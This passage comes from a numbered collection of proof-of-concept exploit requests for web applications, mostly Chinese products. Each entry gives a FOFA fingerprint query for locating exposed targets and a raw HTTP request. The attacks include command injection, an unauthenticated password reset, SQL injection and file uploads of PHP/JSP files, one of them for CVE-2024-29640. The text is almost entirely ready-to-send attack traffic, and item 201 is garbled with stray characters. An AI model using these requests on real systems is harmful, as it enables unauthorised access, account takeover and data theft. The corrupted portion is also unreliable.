Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager/upload endpoint file upload

1. Run the POC to obtain the CSRF value and then the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
8 |$ ~2 y* Q2 a' I4 }4 o
& N7 l, m8 ^8 A201. 方正全媒体新闻采编系统 binary SQL注入# L2 ^& j( d5 a. x1 O& C( Z
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
! m0 s2 ?+ j2 O2 e! p; Q7 bPOST /newsedit/newsplan/task/binary.do HTTP/1.1: T8 o, p5 V1 Y- u  {4 D1 _
Content-Type: application/x-www-form-urlencoded
/ c% u/ ^$ P2 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: ?, T' N0 {6 b" W3 g3 {6 e, K
Accept-Encoding: gzip, deflate
8 p# G7 q: F  e9 p) {* D9 _  mAccept-Language: zh-CN,zh;q=0.9
. P( u+ n9 W- y7 `7 iConnection: close  {) O4 Y3 }* B: w5 h
! |& Y9 W' P' F) H: a6 D
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1( E# x. L+ G, r. G8 _6 P9 _  p1 Z9 ^$ E

( A- E) q+ C' |, O7 d5 @7 c) f
202. 微擎 (WeEngine) system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--